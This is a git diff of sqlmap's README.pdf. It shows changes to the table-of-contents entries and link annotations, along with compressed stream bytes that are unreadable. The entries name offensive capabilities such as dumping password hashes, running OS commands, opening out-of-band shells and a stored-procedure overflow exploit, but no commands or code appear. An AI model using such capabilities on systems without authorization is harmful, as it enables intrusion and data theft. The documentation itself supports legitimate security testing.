      diff --git a/doc/README.pdf b/doc/README.pdf index 1c69e46b5..e2910ff5c 100644 --- a/doc/README.pdf +++ b/doc/README.pdf @@ -25,1721 +25,1292 @@ endobj (Techniques) endobj 21 0 obj -<< /S /GoTo /D (section.2) >> +<< /S /GoTo /D (subsection.1.4) >> endobj 24 0 obj -(Features) +(Demo) endobj 25 0 obj -<< /S /GoTo /D (subsection.2.1) >> +<< /S /GoTo /D (section.2) >> endobj 28 0 obj -(Generic features) +(Features) endobj 29 0 obj -<< /S /GoTo /D (subsection.2.2) >> +<< /S /GoTo /D (subsection.2.1) >> endobj 32 0 obj -(Enumeration features) +(Generic features) endobj 33 0 obj -<< /S /GoTo /D (subsection.2.3) >> +<< /S /GoTo /D (subsection.2.2) >> endobj 36 0 obj -(Takeover features) +(Fingerprint and enumeration features) endobj 37 0 obj -<< /S /GoTo /D (section.3) >> +<< /S /GoTo /D (subsection.2.3) >> endobj 40 0 obj -(Download and update) +(Takeover features) endobj 41 0 obj -<< /S /GoTo /D (section.4) >> +<< /S /GoTo /D (section.3) >> endobj 44 0 obj -(License and copyright) +(Download and update) endobj 45 0 obj -<< /S /GoTo /D (section.5) >> +<< /S /GoTo /D (section.4) >> endobj 48 0 obj -(Usage) +(License and copyright) endobj 49 0 obj -<< /S /GoTo /D (subsection.5.1) >> +<< /S /GoTo /D (section.5) >> endobj 52 0 obj -(Output verbosity) +(Usage) endobj 53 0 obj -<< /S /GoTo /D (subsection.5.2) >> +<< /S /GoTo /D (subsection.5.1) >> endobj 56 0 obj -(Target) +(Output verbosity) endobj 57 0 obj -<< /S /GoTo /D (subsubsection.5.2.1) >> +<< /S /GoTo /D (subsection.5.2) >> endobj 60 0 obj -(Target URL) +(Target) endobj 61 0 obj -<< /S /GoTo /D (subsubsection.5.2.2) >> +<< /S /GoTo /D (subsubsection.5.2.1) >> endobj 64 0 obj -(Parse targets from Burp or WebScarab logs) +(Target URL) endobj 65 0 obj -<< /S /GoTo /D (subsubsection.5.2.3) >> +<< /S /GoTo /D (subsubsection.5.2.2) >> endobj 68 0 obj -(Process Google dork results as target urls) +(Parse targets from Burp or WebScarab proxy logs) endobj 69 0 obj -<< /S /GoTo /D (subsubsection.5.2.4) >> +<< /S /GoTo /D (subsubsection.5.2.3) >> endobj 72 0 obj -(Load options from a configuration INI file) +(Load HTTP request from a file) endobj 73 0 obj -<< /S /GoTo /D (subsection.5.3) >> +<< /S /GoTo /D (subsubsection.5.2.4) >> endobj 76 0 obj -(Request) +(Process Google dork results as target addresses) endobj 77 0 obj -<< /S /GoTo /D (subsubsection.5.3.1) >> +<< /S /GoTo /D (subsubsection.5.2.5) >> endobj 80 0 obj -(HTTP method: GET or POST) +(Load options from a configuration INI file) endobj 81 0 obj -<< /S /GoTo /D (subsubsection.5.3.2) >> +<< /S /GoTo /D (subsection.5.3) >> endobj 84 0 obj -(HTTP Cookie header) +(Request) endobj 85 0 obj -<< /S /GoTo /D (subsubsection.5.3.3) >> +<< /S /GoTo /D (subsubsection.5.3.1) >> endobj 88 0 obj -(HTTP Referer header) +(HTTP method: GET or POST) endobj 89 0 obj -<< /S /GoTo /D (subsubsection.5.3.4) >> +<< /S /GoTo /D (subsubsection.5.3.2) >> endobj 92 0 obj -(HTTP User-Agent header) +(HTTP Cookie header) endobj 93 0 obj -<< /S /GoTo /D (subsubsection.5.3.5) >> +<< /S /GoTo /D (subsubsection.5.3.3) >> endobj 96 0 obj -(Extra HTTP headers) +(HTTP User-Agent header) endobj 97 0 obj -<< /S /GoTo /D (subsubsection.5.3.6) >> +<< /S /GoTo /D (subsubsection.5.3.4) >> endobj 100 0 obj -(HTTP Basic and Digest authentications) +(HTTP Referer header) endobj 101 0 obj -<< /S /GoTo /D (subsubsection.5.3.7) >> +<< /S /GoTo /D (subsubsection.5.3.5) >> endobj 104 0 obj -(HTTP proxy) +(Extra HTTP headers) endobj 105 0 obj -<< /S /GoTo /D (subsubsection.5.3.8) >> +<< /S /GoTo /D (subsubsection.5.3.6) >> endobj 108 0 obj -(Concurrent HTTP requests) +(HTTP Basic, Digest and NTLM authentications) endobj 109 0 obj -<< /S /GoTo /D (subsubsection.5.3.9) >> +<< /S /GoTo /D (subsubsection.5.3.7) >> endobj 112 0 obj -(Delay in seconds between each HTTP request) +(HTTP Certificate authentication) endobj 113 0 obj -<< /S /GoTo /D (subsubsection.5.3.10) >> +<< /S /GoTo /D (subsubsection.5.3.8) >> endobj 116 0 obj -(Seconds to wait before timeout connection) +(HTTP proxy) endobj 117 0 obj -<< /S /GoTo /D (subsubsection.5.3.11) >> +<< /S /GoTo /D (subsubsection.5.3.9) >> endobj 120 0 obj -(Maximum number of retries when the HTTP connection timeouts) +(Concurrent HTTP requests) endobj 121 0 obj -<< /S /GoTo /D (subsection.5.4) >> +<< /S /GoTo /D (subsubsection.5.3.10) >> endobj 124 0 obj -(Injection) +(Delay in seconds between each HTTP request) endobj 125 0 obj -<< /S /GoTo /D (subsubsection.5.4.1) >> +<< /S /GoTo /D (subsubsection.5.3.11) >> endobj 128 0 obj -(Testable parameter\(s\)) +(Seconds to wait before timeout connection) endobj 129 0 obj -<< /S /GoTo /D (subsubsection.5.4.2) >> +<< /S /GoTo /D (subsubsection.5.3.12) >> endobj 132 0 obj -(Force the database management system name) +(Maximum number of retries when the HTTP connection timeouts) endobj 133 0 obj -<< /S /GoTo /D (subsubsection.5.4.3) >> +<< /S /GoTo /D (subsubsection.5.3.13) >> endobj 136 0 obj -(Force the database management system operating system name) +(Filtering targets from provided proxy log using regular expression) endobj 137 0 obj -<< /S /GoTo /D (subsubsection.5.4.4) >> +<< /S /GoTo /D (subsection.5.4) >> endobj 140 0 obj -(Custom injection payload) +(Injection) endobj 141 0 obj -<< /S /GoTo /D (subsubsection.5.4.5) >> +<< /S /GoTo /D (subsubsection.5.4.1) >> endobj 144 0 obj -(Page comparison) +(Testable parameter\(s\)) endobj 145 0 obj -<< /S /GoTo /D (subsubsection.5.4.6) >> +<< /S /GoTo /D (subsubsection.5.4.2) >> endobj 148 0 obj -(Exclude specific page content) +(Force the database management system name) endobj 149 0 obj -<< /S /GoTo /D (subsection.5.5) >> +<< /S /GoTo /D (subsubsection.5.4.3) >> endobj 152 0 obj -(Techniques) +(Force the database management system operating system name) endobj 153 0 obj -<< /S /GoTo /D (subsubsection.5.5.1) >> +<< /S /GoTo /D (subsubsection.5.4.4) >> endobj 156 0 obj -(Test for stacked queries \(multiple statements\) support) +(Custom injection payload) endobj 157 0 obj -<< /S /GoTo /D (subsubsection.5.5.2) >> +<< /S /GoTo /D (subsubsection.5.4.5) >> endobj 160 0 obj -(Test for time based blind SQL injection) +(Page comparison) endobj 161 0 obj -<< /S /GoTo /D (subsubsection.5.5.3) >> +<< /S /GoTo /D (subsubsection.5.4.6) >> endobj 164 0 obj -(Test for UNION query SQL injection) +(Exclude specific page content) endobj 165 0 obj -<< /S /GoTo /D (subsubsection.5.5.4) >> +<< /S /GoTo /D (subsection.5.5) >> endobj 168 0 obj -(Use the UNION query SQL injection) +(Techniques) endobj 169 0 obj -<< /S /GoTo /D (subsection.5.6) >> +<< /S /GoTo /D (subsubsection.5.5.1) >> endobj 172 0 obj -(Fingerprint) +(Test for stacked queries \(multiple statements\) support) endobj 173 0 obj -<< /S /GoTo /D (subsubsection.5.6.1) >> +<< /S /GoTo /D (subsubsection.5.5.2) >> endobj 176 0 obj -(Extensive database management system fingerprint) +(Test for time based blind SQL injection) endobj 177 0 obj -<< /S /GoTo /D (subsection.5.7) >> +<< /S /GoTo /D (subsubsection.5.5.3) >> endobj 180 0 obj -(Enumeration) +(Test for UNION query SQL injection) endobj 181 0 obj -<< /S /GoTo /D (subsubsection.5.7.1) >> +<< /S /GoTo /D (subsubsection.5.5.4) >> endobj 184 0 obj -(Banner) +(Use the UNION query SQL injection) endobj 185 0 obj -<< /S /GoTo /D (subsubsection.5.7.2) >> +<< /S /GoTo /D (subsection.5.6) >> endobj 188 0 obj -(Current user) +(Fingerprint) endobj 189 0 obj -<< /S /GoTo /D (subsubsection.5.7.3) >> +<< /S /GoTo /D (subsubsection.5.6.1) >> endobj 192 0 obj -(Current database) +(Extensive database management system fingerprint) endobj 193 0 obj -<< /S /GoTo /D (subsubsection.5.7.4) >> +<< /S /GoTo /D (subsection.5.7) >> endobj 196 0 obj -(Detect if the DBMS current user is a database administrator) +(Enumeration) endobj 197 0 obj -<< /S /GoTo /D (subsubsection.5.7.5) >> +<< /S /GoTo /D (subsubsection.5.7.1) >> endobj 200 0 obj -(Users) +(Banner) endobj 201 0 obj -<< /S /GoTo /D (subsubsection.5.7.6) >> +<< /S /GoTo /D (subsubsection.5.7.2) >> endobj 204 0 obj -(Users password hashes) +(Session user) endobj 205 0 obj -<< /S /GoTo /D (subsubsection.5.7.7) >> +<< /S /GoTo /D (subsubsection.5.7.3) >> endobj 208 0 obj -(Users privileges) +(Current database) endobj 209 0 obj -<< /S /GoTo /D (subsubsection.5.7.8) >> +<< /S /GoTo /D (subsubsection.5.7.4) >> endobj 212 0 obj -(Available databases) +(Detect if the session user is a database administrator \(DBA\)) endobj 213 0 obj -<< /S /GoTo /D (subsubsection.5.7.9) >> +<< /S /GoTo /D (subsubsection.5.7.5) >> endobj 216 0 obj -(Databases tables) +(Users) endobj 217 0 obj -<< /S /GoTo /D (subsubsection.5.7.10) >> +<< /S /GoTo /D (subsubsection.5.7.6) >> endobj 220 0 obj -(Database table columns) +(Users password hashes) endobj 221 0 obj -<< /S /GoTo /D (subsubsection.5.7.11) >> +<< /S /GoTo /D (subsubsection.5.7.7) >> endobj 224 0 obj -(Dump database table entries) +(Users privileges) endobj 225 0 obj -<< /S /GoTo /D (subsubsection.5.7.12) >> +<< /S /GoTo /D (subsubsection.5.7.8) >> endobj 228 0 obj -(Dump all databases tables entries) +(Available databases) endobj 229 0 obj -<< /S /GoTo /D (subsubsection.5.7.13) >> +<< /S /GoTo /D (subsubsection.5.7.9) >> endobj 232 0 obj -(Run your own SQL statement) +(Databases tables) endobj 233 0 obj -<< /S /GoTo /D (subsection.5.8) >> +<< /S /GoTo /D (subsubsection.5.7.10) >> endobj 236 0 obj -(File system access) +(Database table columns) endobj 237 0 obj -<< /S /GoTo /D (subsubsection.5.8.1) >> +<< /S /GoTo /D (subsubsection.5.7.11) >> endobj 240 0 obj -(Read a file from the back-end DBMS file system) +(Dump database table entries) endobj 241 0 obj -<< /S /GoTo /D (subsubsection.5.8.2) >> +<< /S /GoTo /D (subsubsection.5.7.12) >> endobj 244 0 obj -(Write a local file on the back-end DBMS file system) +(Dump all databases tables entries) endobj 245 0 obj -<< /S /GoTo /D (subsection.5.9) >> +<< /S /GoTo /D (subsubsection.5.7.13) >> endobj 248 0 obj -(Operating system access) +(Execute custom SQL statement) endobj 249 0 obj -<< /S /GoTo /D (subsubsection.5.9.1) >> +<< /S /GoTo /D (subsection.5.8) >> endobj 252 0 obj -(Execute arbitrary operating system command) +(User-defined function injection) endobj 253 0 obj -<< /S /GoTo /D (subsubsection.5.9.2) >> +<< /S /GoTo /D (subsubsection.5.8.1) >> endobj 256 0 obj -(Prompt for an out-of-band shell, meterpreter or VNC) +(Inject custom user-defined functions \(UDF\)) endobj 257 0 obj -<< /S /GoTo /D (subsubsection.5.9.3) >> +<< /S /GoTo /D (subsection.5.9) >> endobj 260 0 obj -(One click prompt for an out-of-band shell, meterpreter or VNC) +(File system access) endobj 261 0 obj -<< /S /GoTo /D (subsubsection.5.9.4) >> +<< /S /GoTo /D (subsubsection.5.9.1) >> endobj 264 0 obj -(Stored procedure buffer overflow exploitation) +(Read a file from the database server's file system) endobj 265 0 obj -<< /S /GoTo /D (subsection.5.10) >> +<< /S /GoTo /D (subsubsection.5.9.2) >> endobj 268 0 obj -(Miscellaneous) +(Write a local file on the database server's file system) endobj 269 0 obj -<< /S /GoTo /D (subsubsection.5.10.1) >> +<< /S /GoTo /D (subsection.5.10) >> endobj 272 0 obj -(Estimated time of arrival) +(Operating system access) endobj 273 0 obj -<< /S /GoTo /D (subsubsection.5.10.2) >> +<< /S /GoTo /D (subsubsection.5.10.1) >> endobj 276 0 obj -(Update sqlmap to the latest stable version) +(Execute arbitrary operating system command) endobj 277 0 obj -<< /S /GoTo /D (subsubsection.5.10.3) >> +<< /S /GoTo /D (subsubsection.5.10.2) >> endobj 280 0 obj -(Save and resume all data retrieved on a session file) +(Prompt for an out-of-band shell, Meterpreter or VNC) endobj 281 0 obj -<< /S /GoTo /D (subsubsection.5.10.4) >> +<< /S /GoTo /D (subsubsection.5.10.3) >> endobj 284 0 obj -(Save options on a configuration INI file) +(One click prompt for an out-of-band shell, meterpreter or VNC) endobj 285 0 obj -<< /S /GoTo /D (subsubsection.5.10.5) >> +<< /S /GoTo /D (subsubsection.5.10.4) >> endobj 288 0 obj -(Act in non-interactive mode) +(Database stored procedure heap-based buffer overflow exploit) endobj 289 0 obj -<< /S /GoTo /D (subsubsection.5.10.6) >> +<< /S /GoTo /D (subsection.5.11) >> endobj 292 0 obj -(Clean up the DBMS by sqlmap specific UDF and tables) +(Windows registry access) endobj 293 0 obj -<< /S /GoTo /D (section.6) >> +<< /S /GoTo /D (subsubsection.5.11.1) >> endobj 296 0 obj -(Disclaimer) +(Read a Windows registry key value) endobj 297 0 obj -<< /S /GoTo /D (section.7) >> +<< /S /GoTo /D (subsubsection.5.11.2) >> endobj 300 0 obj -(Author) +(Write a Windows registry key value data) endobj 301 0 obj -<< /S /GoTo /D [302 0 R /Fit ] >> +<< /S /GoTo /D (subsubsection.5.11.3) >> endobj -335 0 obj << -/Length 1438 +304 0 obj +(Delete a Windows registry key value) +endobj +305 0 obj +<< /S /GoTo /D (subsubsection.5.11.4) >> +endobj +308 0 obj +(Windows registry key) +endobj +309 0 obj +<< /S /GoTo /D (subsubsection.5.11.5) >> +endobj +312 0 obj +(Windows registry key value) +endobj +313 0 obj +<< /S /GoTo /D (subsubsection.5.11.6) >> +endobj +316 0 obj +(Windows registry key value data) +endobj +317 0 obj +<< /S /GoTo /D (subsubsection.5.11.7) >> +endobj +320 0 obj +(Windows registry key value type) +endobj +321 0 obj +<< /S /GoTo /D (subsection.5.12) >> +endobj +324 0 obj +(Miscellaneous) +endobj +325 0 obj +<< /S /GoTo /D (subsubsection.5.12.1) >> +endobj +328 0 obj +(Session file: save and resume all data retrieved) +endobj +329 0 obj +<< /S /GoTo /D (subsubsection.5.12.2) >> +endobj +332 0 obj +(Flush session file for current target) +endobj +333 0 obj +<< /S /GoTo /D (subsubsection.5.12.3) >> +endobj +336 0 obj +(Estimated time of arrival) +endobj +337 0 obj +<< /S /GoTo /D (subsubsection.5.12.4) >> +endobj +340 0 obj +(Use Google dork results from specified page number) +endobj +341 0 obj +<< /S /GoTo /D (subsubsection.5.12.5) >> +endobj +344 0 obj +(Update sqlmap) +endobj +345 0 obj +<< /S /GoTo /D (subsubsection.5.12.6) >> +endobj +348 0 obj +(Save options in a configuration INI file) +endobj +349 0 obj +<< /S /GoTo /D (subsubsection.5.12.7) >> +endobj +352 0 obj +(Act in non-interactive mode) +endobj +353 0 obj +<< /S /GoTo /D (subsubsection.5.12.8) >> +endobj +356 0 obj +(Cleanup the DBMS by sqlmap specific UDF\(s\) and table\(s\)) +endobj +357 0 obj +<< /S /GoTo /D (section.6) >> +endobj +360 0 obj +(Disclaimer) +endobj +361 0 obj +<< /S /GoTo /D (section.7) >> +endobj +364 0 obj +(Authors) +endobj +365 0 obj +<< /S /GoTo /D [366 0 R /Fit ] >> +endobj +400 0 obj << +/Length 1490 /Filter /FlateDecode >> stream -xÚíZ[“Ú6~çWø­b¦¨ºËî[ö’m2™$ÝéCÚ¯à0+ۛ쿯dÉ–M3Ó-ºYHÚŽF…Y ¥à"«™rãÐ]¯ —ç¶o¤†bîúD¥Ë¼X¸‰ÊŸÝèu=»w#Âý-‚Pbå˜ Äk@Ñ€ -(æÖ?œæ¥›oWdö’Õsµ¨Ü­öQ5mVÈ´f ¥û9OdÝ¿!3eÔPe÷?3R,c[µR -Œ1p>UÙç ý,-ºø[eÕn%Ób®–éD…ò)–3½µµYZYšÊÊý¼s8C‡ 1Ò¤L!3GÑxnÈ TÊ\¨ÊÖedàMH %õBp^TÚBIÀ¨Î*KõÆÌ ‘ÔühþHT·qj  šíFsv¥”^+4z1"\«Û:×Ê0o¡YmbO„¥…#ôÈ K’Ãþð—ÿ¬¾- ±ÀÉŠ´ÖËgyžÚÓ‰çéC¦©Î‹€ž*Åç« ò®®–µ¯ë|!yc -> Š2¯ìïû ©ŒÉÉ.žhØØF:2¾Š0Α鉪BRä ÿýÒIÛG!0AIÀacr˜±u³ûxý&èGÄñɸ~ ;¡q5æe‰yoÓ‚T—¾«T¥MKnÒÇ@U¾µ5ÖÅÜ==«õÒ -ŸHüÑP7²T§7îѬ˜y…ÀÇ….mÑÕ¾“¨Jß?¼r7ŠIÛéÚ·öL>VÏ*?/õàWkFSëYˆ,NVÓ ð£«ù `æ~ãÒ#{"—¶ñè›S\ØÆªƒ1u÷³bñ'¢lR¯—+¯Þ¾rûhôI¹ ÏÈ•t"¼·ŒtûoºÖUe€MÎz -¤?Øûˆ§E^ºŠ¼¿ ‡ïÝñž«jê¼ÏèWßË'kY3FÔ#¢Íµ¯.‡þ•Ézjˆlç˜(Ð!Ç„Û)ïß}nlaK E0¡¬}Dåý#  Q‡ü’u~C…1‰[\Ï‹âs®:ø¤ Š„·Ó¦*)˜y|´†ÝIšÜKZCNhÈ=„³k5VZé.Ò̰ݤÎÕ7w’ï·4ãÿ$'Û¹]åbíc©ôàÅľ7‰ã -Œw‡fG$;IJö“d£áŽ{’.¿VÚ'{mäcéösƒŽ¶träyH@A€¼ïÚP(±–³´Ì³C!†e±JEl²#ÏH «Tä"Ÿø ug„KëjêßìçYê*†íŠŠˆgÄ`'uh¿Ù)!}2H—¦†%| š¢29uÕsp?Á bÏÈy±Èj­ýéÝvqÚ•háiNðø±N+ ÷LäÁ¾P³Ô}Îæ¾þZ8”K•‹‘o2Ü4µ”ªì¼/ÍÛ5å; -*uŸ8¸?}3%Ý]G3„Ÿ]O!@wóz9ìý¿4þ +xÚíZIsÛ6¾ëWðVj&B±${‹—¸éØIj3ÓƒÛLAkI”A2ÿ}d$ÖâÖ3^t"HAïß÷V€Ð{Ð;ëA{=Jz?@¡‡!` ^2òBì…4!Å^2ô®ýân:ã‹þ€Àد +!*ô8òg¼?@þ¼âÓþ_Éo½Ó¤w×CJ(ôP-ƒ`€ñÒYO?£,ò0ˆHàIáz¿[̓˜aÖ(F Q`ßôqäß×ÂT9¶â/ÏzÞõ€ê‰>òeý"¼ sõ‚„ø'|&¦ÂŒßs=VžY~-…øï6)!þE&óbÊû8ô¿1W%Ÿ-¸\—…(ÅHÍQï-d‘ås3‚è]p™j1s‹¨}Ž!‚Z˜B$ZBz‹©$™d…™¯—¨”¤ÕLÌKó¨ù©œÔK¦†+…Iang¼¦Ê̱©)›W^Üi@§JŠ69ê+X)¥þñD¤·+ú‰¿Ð •ùß"-7+™ä3±àcÑÅÌ(×`ʵ¥My©y/JsûÍ€ ‚XI§€P†-„TÙ¶ðX1B_ +u~Y<ð^JZeG $Vêbø• ì—RC‰ýa•–šï•%¨W8$ê¦þ#yPÝŠ(@C –ë ”3„ahµ¥AŒýKqWeR(æ54í"ZØ‚˜iZw¼Ð8Þïÿñòlõ­{3CqKZ6†–§Æ:¶<]¥bÎe–;üñ ÄòE‘F÷&XÒ’~D|‘jϚ̳»J8î‡ä  ú„Šº ö&ŒZÂNÄÌñ°Æ6þw}]¼±-¼­eRU U̘tj6éôC_¥-ÁËJ®»ÜZeÊ¢Önp›EÏÄ\È,5…ŨS±Z#DáÁZžÐ>Öý·ÙóC6 ¹™©r O|>4Ÿ©}Tõ+yٖٱˆöšÙëÂ=Ü÷•Èo릮½m7cpbÕÝ‚küt|íG‰‰£'¹nKþ™Os®}%jœF ª…iUtó´)ÂFµkƒfâJ?DâóLÕ»…XÓ™æ ý>÷2Oê~i£æxGÍvÉÑüµpšÇåî”3‚6g|®ÊEeCÑ7ÝÝ +y£úðÐÏ‹¬Ô÷÷N­áƒ_<Ò/ò „÷ dA›@L “cQº¤„üŸ< Õôm­ë1ªZw8¬]QºÌbív_/Ïm¢(:8×Ó°ã:Wí^š˜/º,ರ›}%¯·^Ç}ä‹Òî8Žd>3¿UraF¹-$þèGªŠ»¹J¹ä7v¿°–P×ßïÍ£i>vûo„Ÿ ¶ î\ò†?@%Ôs“´ÕÊM’/f$…Þ…(×!åæò'$têìœað*-ÜC…°bÚX±´颰ÛçgæA>nN†¹¼m˜(ªiiçqkäåRpâášS¸åq@Ø +Ú4p,8_èÎÌ¢5²¾ü™ÍšošÏµ«å>îã§›ádÀGÛtçE²t cšpU +”'ΙÑã*ÒV4?"ûL”m†¿Ø£+¼Ô HT“Çšæì4±'„Ë- Š„a3'—]rTÒ†¨™òåóU²²„5‚˜Ðfö+¶ŸG:&b À(ZÏá¤-Œj~]Ž\óü6| +X4Ó&‚…sÊFoÖ±;I‹·’G ÀÄõI²g_ !ïÇúÀÝå-Ch3o"úÂmGmw,Ê(éœt’.ÅHH!»> endobj -303 0 obj << +367 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [84.837 715.552 190.43 726.342] /Subtype/Link/A<> >> endobj -304 0 obj << +368 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [197.844 715.552 277.692 726.342] +/Subtype/Link/A<> +>> endobj +369 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [251.615 678.858 282.797 689.981] /Subtype/Link/A<> >> endobj -305 0 obj << +370 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [368.039 678.858 411.837 689.981] /Subtype/Link/A<> >> endobj -306 0 obj << +371 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 611.458 151.087 620.326] /Subtype /Link /A << /S /GoTo /D (section.1) >> >> endobj -307 0 obj << +372 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 590.745 170.274 601.536] /Subtype /Link /A << /S /GoTo /D (subsection.1.1) >> >> endobj -308 0 obj << +373 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 573.906 147.393 582.76] /Subtype /Link /A << /S /GoTo /D (subsection.1.2) >> >> endobj -309 0 obj << +374 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 553.193 158.765 563.984] /Subtype /Link /A << /S /GoTo /D (subsection.1.3) >> >> endobj -310 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 526.393 130.31 535.261] -/Subtype /Link -/A << /S /GoTo /D (section.2) >> ->> endobj -311 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 507.617 181.576 516.471] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.1) >> ->> endobj -312 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 488.841 204.609 497.695] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.2) >> ->> endobj -313 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 470.065 187.041 478.919] -/Subtype /Link -/A << /S /GoTo /D (subsection.2.3) >> ->> endobj -314 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 439.391 198.218 450.196] -/Subtype /Link -/A << /S /GoTo /D (section.3) >> ->> endobj -315 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 410.655 197.445 421.46] -/Subtype /Link -/A << /S /GoTo /D (section.4) >> ->> endobj -316 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [71.004 381.919 117.812 392.723] -/Subtype /Link -/A << /S /GoTo /D (section.5) >> ->> endobj -317 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 363.142 185.906 373.933] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.1) >> ->> endobj -318 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 344.366 139.37 355.157] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.2) >> ->> endobj -319 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 325.59 195.59 336.381] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.1) >> ->> endobj -320 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 306.814 332.847 317.605] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.2) >> ->> endobj -321 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 288.038 324.616 298.828] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.3) >> ->> endobj -322 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 269.261 325.571 280.052] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.2.4) >> ->> endobj -323 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [85.944 250.485 145.623 261.276] -/Subtype /Link -/A << /S /GoTo /D (subsection.5.3) >> ->> endobj -324 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 233.646 266.916 242.5] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.1) >> ->> endobj -325 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 214.869 238.17 223.723] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.2) >> ->> endobj -326 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 196.093 243.399 204.947] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.3) >> ->> endobj -327 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 175.104 259.086 186.171] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.4) >> ->> endobj -328 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 158.541 235.514 167.395] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.5) >> ->> endobj -329 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 137.551 324.934 148.619] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.6) >> ->> endobj -330 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 119.052 199.325 129.842] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.7) >> ->> endobj -331 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 100.276 262.296 111.066] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.8) >> ->> endobj -332 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[1 0 0] -/Rect [108.853 81.499 342.669 92.29] -/Subtype /Link -/A << /S /GoTo /D (subsubsection.5.3.9) >> ->> endobj -336 0 obj << -/D [302 0 R /XYZ 72 793.935 null] ->> endobj -337 0 obj << -/D [302 0 R /XYZ 72 760.449 null] ->> endobj -342 0 obj << -/D [302 0 R /XYZ 72 631.328 null] ->> endobj -334 0 obj << -/Font << /F17 338 0 R /F15 339 0 R /F18 340 0 R /F20 341 0 R /F21 343 0 R /F22 344 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -385 0 obj << -/Length 1523 -/Filter /FlateDecode ->> -stream -xÚí[Év›HÝë+X¢sZ„ ¨eDZÓÉIl'RºIeT¶éfP<ü}ª¨‰A-‹¨ÓvÌF˜I {ßpß«gÛ¸2lãõäÛˆ­mƒ@ƒPÛ”~4ùüÕ6–âø[ö0õŒÛòªÈÀ®'¶¡1Ÿ|˜¼\L^œ@`P‹ºÐ5—ê;E‘c,–Ægóèìtq|º˜O¿.Þ¾8ÎÆ¥ØE– Åw•ByÅÄÖ/¥^(½ÒoöñõĘaèX€ñ²0¦ê6ÇB°§3csÎý$^fÓBÈÌ¹Åæíz& ruôb:»ü2I¹¾,ˆxRè³âö˜ûyÄ—1>Ϥ¦5aZnÛþ9›Ïk½<€šp'À¶1žEˆ»,PȾgwA$,"…T<…DîˆCÒTH.Õ6åypÍÅí5ùµÆýÅâ¼ú&#YûWxžw0`‡4ƒÐ¢6mħ3`Ch¾‰ÿÞb<Ôydò¤Ÿ×!Ú&D»ÈÛÂ%,aâ‹©‡Lžåì"Ô&ºb)‹xÎÓ/¶cgâ´M\ô\íõ ´wˆÁÔøŸHü“Ô¯âr(–LPÂ2½±˜]ñH„srS²û,çU\ŒuÜÏ#š^(ñC¡$k(ÑA¡LV:°³<ˆ¯Ô±Pü3ArØÖ YžèŸÔ‘[;¾Ìn÷a–ôù„äƒaîhÌÏK-vūĉdÝ„éb2f¼]Ï@„«‰8¾óÃb©yÈ´£ûÁa¿ò5M*BðRó宄òù…µJ¯ÐJÑÑJQi _Âzß -Þ»” Q$þȃz]†î%ëÌêtD¢ò QEjÊYIæ?ÒCøR´®+ )!UæÁªR˜â$0s&S*0µ)¡©N+åšIÚãvôÿãm˜Stâ‘S‹¿-¸ÊRP×íB¶,•F¹ƒXC<ÿð®ÀÛùÚAOÏØûàEöxÑ¿ÃûéôÍÙéÚXï¾»AE<õxÒ 1q%'?emµ]£‹×è>Ädõžz@ïEwh{ÅÕIóDT!<]¥.XÚí!Æf 